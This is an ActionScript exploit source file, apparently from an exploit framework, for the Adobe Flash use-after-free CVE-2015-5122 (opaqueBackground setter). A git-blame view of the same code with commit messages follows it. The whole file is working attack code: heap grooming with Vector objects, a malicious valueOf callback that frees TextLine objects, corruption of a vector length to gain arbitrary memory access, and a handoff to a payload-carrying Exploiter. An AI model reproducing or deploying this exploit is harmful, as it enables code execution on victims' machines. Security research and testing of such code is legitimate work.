external/source/exploits/CVE-2015-5122/MyClass.as

package
{
    import flash.display.DisplayObjectContainer;
    import flash.utils.ByteArray;
    import flash.system.Capabilities;
    import flash.events.MouseEvent;
    import flash.external.ExternalInterface;
    import flash.text.*;
    import flash.text.*;
    import flash.text.engine.*;

    public class MyClass
    {
        static var 
            _gc:Array,
            _ar:Array,
            _ar_reuse:Array,
            _ar_text_line:Array,
            _arLen:int,
            _ar_reuseLen:int,
            _ar_text_lineLen:int,
            _vu:Vector.<uint>,
            _tb:TextBlock,
            _mc:MyClass,
            _cnt:int,
            _vLen:int,
            LEN40:uint = 0x40000000;
		
        static function valueOf2()
        {
            try 
            {
                if (++_cnt < _ar_text_lineLen) {
                    //recursive call for next TextLine
                    _ar_text_line[_cnt].opaqueBackground = _mc;
                } else {
                    for(var i:int = 1; i <= 19; i++)
                        _tb.recreateTextLine(_ar_text_line[_ar_text_lineLen - i]);
                    // reuse freed memory
                    for(i=0; i < _ar_reuseLen; i++)
                        _ar_reuse[i].length = _vLen;
                }
            }
            catch (e:Error)
            {
                Logger.log("valueOf2 " + e.toString());
            }
            
            return _vLen+8;
        }
		
		static function TryExpl(e:Exploit, platform:String, payload:ByteArray, try_number:uint)
		{
            if (try_number > 3)
                return
            
			try
			{
                // init vars
                Logger.log("init vars")
                _arLen = 30
                _ar_text_lineLen = 50
                _ar_reuseLen = 80
                
                _ar = new Array(_arLen);
                _ar_text_line = new Array(_ar_text_lineLen)
                _ar_reuse = new Array(_ar_reuseLen)
                
                if (!_gc) _gc = new Array();
                _gc.push(_ar);
                _gc.push(_ar_text_line);
                _gc.push(_ar_reuse);
                
                if (!_tb) {
                    _tb = new TextBlock(new TextElement("TextElement", new ElementFormat()));
                    if (!_tb) throw new Error("_tb = " + _tb);
                }
                
                _mc = new MyClass();
                
                _vLen = 400/4-2;
                // fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)
                Logger.log("fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)")
                for(var i:uint = 0; i < _arLen; i++) 
                    _ar[i] = new Vector.<uint>(_vLen)
				
                // prepare Vector objects
                Logger.log("prepare Vector objects")
                for(i = 0; i < _ar_reuseLen; i++) {
                    _ar_reuse[i] = new Vector.<uint>(8);
                    _ar_reuse[i][0] = i;
                    _ar_reuse[i][1] = 0xdeedbeef
                }
				
                // prepare TextLines
                Logger.log("prepare TextLines")
                for(i = 0; i < _ar_text_lineLen; i++) 
                    _ar_text_line[i] = _tb.createTextLine()

                // fill 1016-byte holes (0x38c is a size of internal TextLine object)
                Logger.log("fill 1016-byte holes (0x38c is a size of internal TextLine object)")
                for(i = 0; i < _ar_text_lineLen; i++) 
                    _ar_text_line[i].opaqueBackground = 1 // alloc 1016 bytes

                // set custom valueOf() for _mc
                Logger.log("set custom valueOf() for _mc")
                MyClass.prototype.valueOf = valueOf2

                // here we go, call the vulnerable setter
                Logger.log("here we go, call the vulnerable setter")
                //_cnt = _ar_text_lineLen - 6
                _cnt = _ar_text_lineLen - 20
                _ar_text_line[_cnt].opaqueBackground = _mc

                // find corrupted vector length 
                Logger.log("find corrupted vector length ")
                for(i=0; i < _ar_reuseLen; i++) {
                    _vu = _ar_reuse[i];
                    if (_vu.length > _vLen+2) {
                    	Logger.log("ar["+i.toString()+"].length = " + _vu.length.toString(16));
                    	Logger.log("ar["+i.toString()+"]["+_vLen.toString(16)+"] = " + _vu[_vLen].toString(16));
                    	if (_vu[_vLen] == _vLen) {
                    		// corrupt next vector 
                    		_vu[_vLen] = LEN40;
                    		// get corrupted vector
                    		_vu = _ar_reuse[_vu[_vLen+2]]; 
                    		break;
                    	}
                    };// else CheckCorrupted(_vu, i); // 4RnD
                }

                // check results
                Logger.log("v.length = " + _vu.length.toString(16));
                
                if (_vu.length < LEN40) throw new Error("try again");

                var exploiter:Exploiter = new Exploiter(e, platform, payload, _vu, 0x62)
			}
			catch (err:Error)
			{
                Logger.log("TryExpl " + err.toString());
                if (err.toString().indexOf("try again") != -1) {
                    MyClass.TryExpl(e, platform, payload, try_number + 1)
                }
			}
		}
		
	}

}
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`package`
			`{`
			`import flash.display.DisplayObjectContainer;`
			`import flash.utils.ByteArray;`
			`import flash.system.Capabilities;`
			`import flash.events.MouseEvent;`
			`import flash.external.ExternalInterface;`
			`import flash.text.*;`
			`import flash.text.*;`
			`import flash.text.engine.*;`

			`public class MyClass`
			`{`
			`static var`
			`_gc:Array,`
			`_ar:Array,`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`_ar_reuse:Array,`
			`_ar_text_line:Array,`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`_arLen:int,`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`_ar_reuseLen:int,`
			`_ar_text_lineLen:int,`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`_vu:Vector.<uint>,`
			`_tb:TextBlock,`
			`_mc:MyClass,`
			`_cnt:int,`
			`_vLen:int,`
			`LEN40:uint = 0x40000000;`

			`static function valueOf2()`
			`{`
			`try`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`{`
			`if (++_cnt < _ar_text_lineLen) {`
			`//recursive call for next TextLine`
			`_ar_text_line[_cnt].opaqueBackground = _mc;`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`} else {`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`for(var i:int = 1; i <= 19; i++)`
			`_tb.recreateTextLine(_ar_text_line[_ar_text_lineLen - i]);`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`// reuse freed memory`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`for(i=0; i < _ar_reuseLen; i++)`
			`_ar_reuse[i].length = _vLen;`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`}`
			`}`
			`catch (e:Error)`
			`{`
			`Logger.log("valueOf2 " + e.toString());`
			`}`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`return _vLen+8;`
			`}`

Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`static function TryExpl(e:Exploit, platform:String, payload:ByteArray, try_number:uint)`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`{`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`if (try_number > 3)`
			`return`

Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`try`
			`{`
			`// init vars`
			`Logger.log("init vars")`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`_arLen = 30`
			`_ar_text_lineLen = 50`
			`_ar_reuseLen = 80`

Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`_ar = new Array(_arLen);`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`_ar_text_line = new Array(_ar_text_lineLen)`
			`_ar_reuse = new Array(_ar_reuseLen)`

Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`if (!_gc) _gc = new Array();`
			`_gc.push(_ar);`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`_gc.push(_ar_text_line);`
			`_gc.push(_ar_reuse);`

Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`if (!_tb) {`
			`_tb = new TextBlock(new TextElement("TextElement", new ElementFormat()));`
			`if (!_tb) throw new Error("_tb = " + _tb);`
			`}`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`_mc = new MyClass();`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`_vLen = 400/4-2;`
			`// fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)`
			`Logger.log("fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)")`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`for(var i:uint = 0; i < _arLen; i++)`
			`_ar[i] = new Vector.<uint>(_vLen)`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00
			`// prepare Vector objects`
			`Logger.log("prepare Vector objects")`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`for(i = 0; i < _ar_reuseLen; i++) {`
			`_ar_reuse[i] = new Vector.<uint>(8);`
			`_ar_reuse[i][0] = i;`
			`_ar_reuse[i][1] = 0xdeedbeef`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`}`

			`// prepare TextLines`
			`Logger.log("prepare TextLines")`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`for(i = 0; i < _ar_text_lineLen; i++)`
			`_ar_text_line[i] = _tb.createTextLine()`

Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`// fill 1016-byte holes (0x38c is a size of internal TextLine object)`
			`Logger.log("fill 1016-byte holes (0x38c is a size of internal TextLine object)")`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`for(i = 0; i < _ar_text_lineLen; i++)`
			`_ar_text_line[i].opaqueBackground = 1 // alloc 1016 bytes`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00
			`// set custom valueOf() for _mc`
			`Logger.log("set custom valueOf() for _mc")`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`MyClass.prototype.valueOf = valueOf2`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00
			`// here we go, call the vulnerable setter`
			`Logger.log("here we go, call the vulnerable setter")`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`//_cnt = _ar_text_lineLen - 6`
			`_cnt = _ar_text_lineLen - 20`
			`_ar_text_line[_cnt].opaqueBackground = _mc`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00
			`// find corrupted vector length`
			`Logger.log("find corrupted vector length ")`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`for(i=0; i < _ar_reuseLen; i++) {`
			`_vu = _ar_reuse[i];`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`if (_vu.length > _vLen+2) {`
			`Logger.log("ar["+i.toString()+"].length = " + _vu.length.toString(16));`
			`Logger.log("ar["+i.toString()+"]["+_vLen.toString(16)+"] = " + _vu[_vLen].toString(16));`
			`if (_vu[_vLen] == _vLen) {`
			`// corrupt next vector`
			`_vu[_vLen] = LEN40;`
			`// get corrupted vector`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`_vu = _ar_reuse[_vu[_vLen+2]];`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`break;`
			`}`
			`};// else CheckCorrupted(_vu, i); // 4RnD`
			`}`

			`// check results`
			`Logger.log("v.length = " + _vu.length.toString(16));`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`if (_vu.length < LEN40) throw new Error("try again");`

Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`var exploiter:Exploiter = new Exploiter(e, platform, payload, _vu, 0x62)`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`}`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`catch (err:Error)`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`{`
Improve adobe_flash_opaque_background_uaf 2015-07-16 14:56:32 -05:00			`Logger.log("TryExpl " + err.toString());`
			`if (err.toString().indexOf("try again") != -1) {`
			`MyClass.TryExpl(e, platform, payload, try_number + 1)`
			`}`
Add module for flash CVE-2015-5122 2015-07-11 00:28:55 -05:00			`}`
			`}`

			`}`

			`}`